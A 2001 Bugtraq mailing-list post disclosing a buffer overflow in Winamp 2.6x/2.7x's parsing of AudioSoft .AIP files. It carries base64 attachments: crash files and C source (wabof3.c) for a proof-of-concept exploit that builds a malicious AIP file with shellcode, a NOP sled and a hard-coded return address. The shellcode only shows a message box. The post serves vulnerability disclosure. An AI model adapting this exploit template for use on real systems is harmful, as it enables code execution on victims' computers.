[20589] in bugtraq
Re: Winamp 2.6x / 2.7x buffer overflow
daemon@ATHENA.MIT.EDU (ByteRage)
Fri May 11 11:21:33 2001
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1649760492-989148812=:20818"
Message-ID: <20010506113332.24736.qmail@web13001.mail.yahoo.com>
Date: Sun, 6 May 2001 04:33:32 -0700
Reply-To: ByteRage <byterage@YAHOO.COM>
From: ByteRage <byterage@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <5.0.2.1.2.20010503220220.02b1f880@mail.powersource.cx>
--0-1649760492-989148812=:20818
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Winamp 2.74 doesnt seem to be affected by the bug
(although I thought it would be), only 2.60 -> 2.73
are affected, the AIP file format is some format
invented by AudioSoft to provide a legal way to get
MP3's from the net. AIP files or AudioSoft parameter
files seem to contain weakly encrypted authentication
information... The buffer overflow occurs right in the
decryption loop, there's no bounds checking there...
When in doubt try out the attached proof of concept
exploit (HACKME.AIP). I don't know whether they fixed
that divide by zero bug yet in v2.74
(CRASH-ZEROES.AIP). I also don't know if the AudioSoft
plugin is used by other music software.
greetz,
[ByteRage]
<byterage@yahoo.com> http://elf.box.sk/byterage
--- Tom Laermans <tom.laermans@POWERSOURCE.CX> wrote:
> Hi,
>
> >WINAMP 2.6x / 2.7x BUFFER OVERFLOW
> >
> >AFFECTED SYSTEMS
> >Winamp 2.73 (full)
> >[...]
> >DESCRIPTION
> >
> >Winamp has a buffer overflow condition when parsing
> >*.AIP files. (which are set to be automatically
> downloaded without
> >user intervention, just like the *.M3U / *.PLS
> files)
>
> Actually, my copy of WinAmp (v2.74) does absolutely
> nothing with .AIP
> files, nor are they listed anywhere in the "File
> Types" in the selection
> box. What are they supposed to do, anyway? (I've
> never heard of 'em before
> either)
>
> Tom
>
> -------------------------------------------------
> Web: http://www.powersource.cx --- ICQ#: 12120754
> Also check this out: http://kickme.to/sidewinder
> Need some cheats?? http://www.chaos-cheatbase.com
> Keep Fido&BBS Alive! http://skynetbbs.dyns.cx
> -------------------------------------------------
__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/
--0-1649760492-989148812=:20818
Content-Type: application/x-zip-compressed; name="aip-files.zip"
Content-Transfer-Encoding: base64
Content-Description: aip-files.zip
Content-Disposition: attachment; filename="aip-files.zip"
UEsDBBQAAAAIANJooioYxLzeCwAAAB4AAAAQAAAAQ1JBU0gtWkVST0VTLmFp
cDM0hAIDAwNDDAAAUEsDBBQAAgAIAJalpSryotaw0wAAADAIAAAKAAAAaGFj
a21lLmFpcDMwgANDCKUAAwbdpj0CAk7dtl+AZGhahrFRRmiwa1DI/2tZjmkZ
+RUZiempThm+qcXFIQH/r4dmePq5K2aEOwb5dd8JzVLMSCvNyclITk4tzihR
KC7NKMjJzwSyUisy8pJTCzLSFJLzM/LTFPIzFAqK8jOM9MwrMvTMKvQzcgsU
jDLCM/MSu89kGQQHhv6/EJrh6gO029s1yA9kd3FaBtDMgKL85AzXiswSsN3/
L0wYBaNgFIyCUTAKRgEx4KXMj///DYgAFsaOLoaGJkYMB16fBgBQSwECFAAU
AAAACADSaKIqGMS83gsAAAAeAAAAEAAAAAAAAAABACAAtoEAAAAAQ1JBU0gt
WkVST0VTLmFpcFBLAQIUABQAAgAIAJalpSryotaw0wAAADAIAAAKAAAAAAAA
AAEAIAC2gTkAAABoYWNrbWUuYWlwUEsFBgAAAAACAAIAdgAAADQBAAAAAA==
--0-1649760492-989148812=:20818
Content-Type: application/octet-stream; name="wabof3.c"
Content-Transfer-Encoding: base64
Content-Description: wabof3.c
Content-Disposition: attachment; filename="wabof3.c"
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KICogd2Fib2YzLmMg
LSBXaW5hbXAgMi42eC8yLjd4IHByb29mIG9mIGNvbmNlcHQgY29kZSAgICAg
ICAgICAgICAgICAgICAgICAgKg0KICogICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgKg0KICogcHJvb2Ygb2YgY29uY2VwdCBjb2RlIHdyaXR0ZW4gYnkg
W0J5dGVSYWdlXSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKg0KICog
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgKg0KICogdGhlIGV4cGxvaXQg
aXMgYmFzZWQgdXBvbiBXTUFVRFNESy5ETEwgdjQuMDAuMDAwMC4zODQ1LCB3
aGljaCBpcyB0aGUgICAgKg0KICogdmVyc2lvbiB0aGF0IGdldHMgaW5zdGFs
bGVkIHdpdGggd2luYW1wIDIuNnggLyAyLjd4LiBJdCBzaG91bGQgd29yayAg
ICAgKg0KICogZmluZSBpZiB0aGF0IHZlcnNpb24gd2Fzbid0IG92ZXJ3cml0
dGVuIGJ5IGFub3RoZXIgcHJvZ3JhbSAgICAgICAgICAgICAgKg0KICogICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgKg0KICogPGJ5dGVyYWdlQHlhaG9v
LmNvbT4gLyBieXRlcmFnZS5jamIubmV0IChodHRwOi8vZWxmLmJveC5zay9i
eXRlcmFnZS8pICAgKg0KICoqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
Ki8NCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQoNCiNkZWZpbmUgTG9hZExpYnJh
cnlBICJceDhDXHgxMFx4MTBceDQyIg0KDQojZGVmaW5lIEdldFByb2NBZGRy
ZXNzICJceEY0XHgxMFx4MTBceDQyIg0KDQpjb25zdCBjaGFyICogbmV3RUJQ
ID0gIjAwMDAwMDAwIjsgLy8gd2UnbGwgc2V0IEVCUD0wIGFuZCB1c2UgaXQg
aW4gdGhlIHNwbG9pdA0KDQpjb25zdCBjaGFyICogbmV3RUlQID0gIjgzQUQx
MTQyIjsgLyogVGhlIG5ldyBFSVAgbXVzdCBqdW1wIHVzIHRvIEVDWA0KICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEA0MjExQUQ4MyB3
ZSBmaW5kIEZGRDEgPSBDQUxMIEVDWA0KICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIChpbiBXTUFVRFNESy5ETEwgNC4wMC4wMDAwLjM4
NDUpICovDQoNCi8vIFRoZSBleHBsb2l0IGlzIG5vIGJpZyB3b25kZXIsIGl0
IGp1c3Qgc2hvd3MgYSBtZXNzYWdlYm94IGFuZCBraWxscw0KLy8gdGhlIHdp
bmFtcCBwcm9jZXNzLCBob3dldmVyIHdlIGhhdmUgMjAxNSBieXRlcyBmb3Ig
b3VyIGNvZGUgYW5kIHdlDQovLyBjYW4gc3RpbGwgcmVsb2FkIGZyb20gdGhl
ICouQUlQIHNvIGluIHRoZW9yeSBhbnl0aGluZyBpcyBwb3NzaWJsZS4uLg0K
DQpjb25zdCBjaGFyIHNwbG9pdFtdID0NCg0KIlx4OEJceDM1IiBMb2FkTGli
cmFyeUENCiJceDhCXHgzRCIgR2V0UHJvY0FkZHJlc3MNCiJceDU1IiJceDY2
XHg2OCIiMzIiIlx4NjgiIlVTRVIiDQoiXHg1NCINCiJceEZGXHhENiINCiJc
eDZBIiJBIiJceDY2XHg2OCIib3giIlx4NjgiImFnZUIiIlx4NjgiIk1lc3Mi
DQoiXHg1NCINCiJceDUwIg0KIlx4RkZceEQ3Ig0KIlx4NTUiIlx4NjgiIklO
RyEiIlx4NjgiIldBUk4iDQoiXHg4Qlx4REMiDQoiXHg1NSIiXHg2QSIiISIi
XHg2OCIiZnVsbCIiXHg2OCIiY2NlcyIiXHg2OCIidCBzdSIiXHg2OCIicGxv
aSINCiJceDY4IiJ0IGV4IiJceDY4IiJuY2VwIiJceDY4IiJmIGNvIiJceDY4
IiJvZiBvIiJceDY4IiIgcHJvIg0KIlx4NjgiIjIuN3giIlx4NjgiIi42eC8i
Ilx4NjgiIm1wIDIiIlx4NjgiIldpbmEiDQoiXHg4Qlx4Q0MiDQoNCiJceDZB
XHgzMCINCiJceDUzIg0KIlx4NTEiDQoiXHg1NSINCiJceEZGXHhEMCINCg0K
Ilx4NTUiIlx4NjgiIkVMMzIiIlx4NjgiIktFUk4iDQoiXHg1NCINCiJceEZG
XHhENiINCiJceDZBIiJzIiJceDY2XHg2OCIiZXMiIlx4NjgiIlByb2MiIlx4
NjgiIkV4aXQiDQoiXHg1NCINCiJceDUwIg0KIlx4RkZceEQ3Ig0KIlx4NTUi
DQoiXHhGRlx4RDAiDQoNCjsNCg0KaW50IGk7DQoNCkZJTEUgKmZpbGU7DQoN
CmludCBtYWluICgpDQp7DQogIA0KICBwcmludGYoIldpbmFtcCAyLjZ4LzIu
N3ggcHJvb2Ygb2YgY29uY2VwdCBjMGRlIGJ5IFtCeXRlUmFnZV1cbiIpOw0K
DQogIGZpbGUgPSBmb3BlbigiaGFja21lLmFpcCIsICJ3K2IiKTsNCiAgaWYg
KCFmaWxlKSB7DQogICAgcHJpbnRmKCJPdWNoeSwgY291bGRuJ3Qgb3BlbiBo
YWNrbWUuYWlwIGZvciBvdXRwdXQgIVxuIik7DQogICAgcmV0dXJuIDE7DQog
IH0NCiAgDQogIGZwcmludGYoZmlsZSwiJTAzZCUwM2QlMDNkJTAzZCUwM2Ql
MDNkJTEwbGQiLDAsMCwwLDEsMCwwLDApOw0KICANCiAgLy8gKDIpIG91ciBl
eHBsb2l0IHN0YXJ0cyBoZXJlDQogIGZ3cml0ZShzcGxvaXQsIDEsIHNpemVv
ZihzcGxvaXQpLTEsIGZpbGUpOw0KICANCiAgLy8gd2UgZmlsbCB0aGUgcmVz
dCB3aXRoIE5PUHMNCiAgZm9yIChpPTA7IGk8KDIwMTUtKHNpemVvZihzcGxv
aXQpLTEpKTsgaSsrKSB7IGZ3cml0ZSgiXHg5MCIsIDEsIDEsIGZpbGUpOyB9
DQogIA0KICAvLyAoMSkgd2UganVtcCBiYWNrIGEgbGl0dGxlIG1vcmUgdG8g
KDIpDQogIGZ3cml0ZSgiXHhFOVx4MUNceEY4XHhGRlx4RkYiLCAxLCA1LCBm
aWxlKTsNCiAgDQogIGZvciAoaT0wOyBpPDI4OyBpKyspIHsgZndyaXRlKCIw
IiwgMSwgMSwgZmlsZSk7IH0NCiAgDQogIGZ3cml0ZShuZXdFQlAsIDEsIDgs
IGZpbGUpOyBmd3JpdGUobmV3RUlQLCAxLCA4LCBmaWxlKTsNCiAgDQogIC8v
IEVDWCBwb2ludHMgaGVyZSBvbiBvdmVyZmxvdw0KICAvLyB3ZSBkb24ndCBo
YXZlIGFsb3Qgc3BhY2UsIHNvIHdlIGp1bXAgdG8gKDEpDQogIGZ3cml0ZSgi
XHgwMFx4QzBceEVCXHhDQiIsIDEsIDQsIGZpbGUpOw0KICANCiAgZmNsb3Nl
KGZpbGUpOw0KDQogIHByaW50ZigiaGFja21lLmFpcCBjcmVhdGVkIVxuIik7
DQogIHJldHVybiAwOw0KDQp9DQo=
--0-1649760492-989148812=:20818--
